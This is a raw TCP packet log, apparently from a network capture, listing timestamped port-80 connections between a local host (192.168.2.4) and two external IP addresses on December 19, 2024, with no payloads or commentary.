                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.455190897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.456012011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.456073999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.456127882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.456176996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.456964970 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.457026958 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.457082033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.457133055 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.457964897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.458017111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.458087921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.458138943 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.458959103 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.459011078 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.459079027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.459130049 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.459888935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.459986925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.460014105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.460063934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.460855961 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.460911989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.460969925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.461019993 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.461822987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.461889029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.461944103 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.461996078 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.462785959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.462841034 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.462909937 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.462964058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.463797092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.463850021 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.463911057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.463960886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.464756012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.464813948 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.464869976 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.464917898 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.465743065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.465811968 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.465864897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.465917110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.466728926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.466783047 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.466836929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.466886044 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.467664957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.467724085 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.467784882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.467834949 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.468636990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.468692064 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.468760967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.468815088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.469630957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.469693899 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.469753981 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.469803095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.470649958 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.470751047 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.470778942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.470828056 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.471555948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.471612930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.471668005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.471719980 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.472536087 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.472594976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.472662926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.472719908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.473510027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.473567009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.473623991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.473673105 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.474482059 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.474539042 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.474608898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.474666119 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.475456953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.475509882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.475570917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.475620985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.476421118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.476471901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.476528883 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.476579905 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.477389097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.477531910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.477552891 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.477581024 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.478404045 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.478458881 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.478507042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.478559017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.479377031 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.479437113 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.479490995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.479541063 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.480314970 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.480374098 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.480427980 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.480479956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.481302977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.481400013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.481446028 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.481496096 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.482320070 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.482382059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.482436895 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.482486963 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.483239889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.483294964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.483381987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.483438969 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.484231949 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.484292030 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.484447956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.484505892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.485187054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.485245943 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.485301018 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.485353947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.486453056 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.486510992 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.486566067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.486618996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.487128973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.487186909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.487253904 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.487309933 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.488203049 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.488265991 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.488336086 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.488392115 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.489083052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.489144087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.489202976 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.489257097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.490092039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.490149021 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.490205050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.490257978 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.491076946 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.491134882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.491188049 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.491241932 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.492002964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.492063046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.492122889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.492175102 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.492969036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.493026018 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.493093967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.493149042 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.494021893 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.494085073 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.494132996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.494184017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.494952917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.495009899 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.495083094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.495138884 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.495918036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.495951891 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.495975018 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.495996952 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.496915102 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.496978045 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.497031927 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.497083902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.497792006 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.497847080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.638840914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.638937950 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.638967037 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.639025927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.639322042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.639374971 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.639415979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.639467955 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.640279055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.640331984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.640630960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.640682936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.640727043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.640786886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.641623020 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.641674995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.641738892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.641794920 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.642601967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.642661095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.642682076 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.642734051 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.643568039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.643621922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.643702984 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.643762112 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.644562960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.644665956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.644723892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.645529032 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.645617008 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.645673990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.646490097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.646662951 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.646718979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.647473097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:13.647540092 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:15.848988056 CET4975480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:15.849339008 CET4977780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:15.968924046 CET8049754185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:15.968981981 CET8049777185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:15.969105005 CET4975480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:15.969105005 CET4977780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:15.969274998 CET4977780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:16.088747025 CET8049777185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:18.929843903 CET8049777185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:18.929929018 CET4977780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:18.933197021 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:18.933518887 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:19.053071022 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:19.053122044 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:19.053162098 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:19.053184986 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:19.053352118 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:19.173049927 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397093058 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397133112 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397170067 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397212982 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397212982 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397227049 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397264004 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397289991 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397309065 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397344112 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397357941 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397381067 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397417068 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397418022 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397439003 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397452116 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397464037 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.397512913 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.517183065 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.517272949 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.517326117 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.517585039 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.521225929 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.521302938 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.521317005 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.521389008 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.589096069 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.589180946 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.589277029 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.589334965 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.593308926 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.593380928 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.593417883 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.593487024 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.601648092 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.601727962 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.601751089 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.601814032 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.610014915 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.610079050 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.610105038 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.610198975 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.618390083 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.618480921 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.618489981 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.618791103 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.626781940 CET804978731.41.244.11192.168.2.4
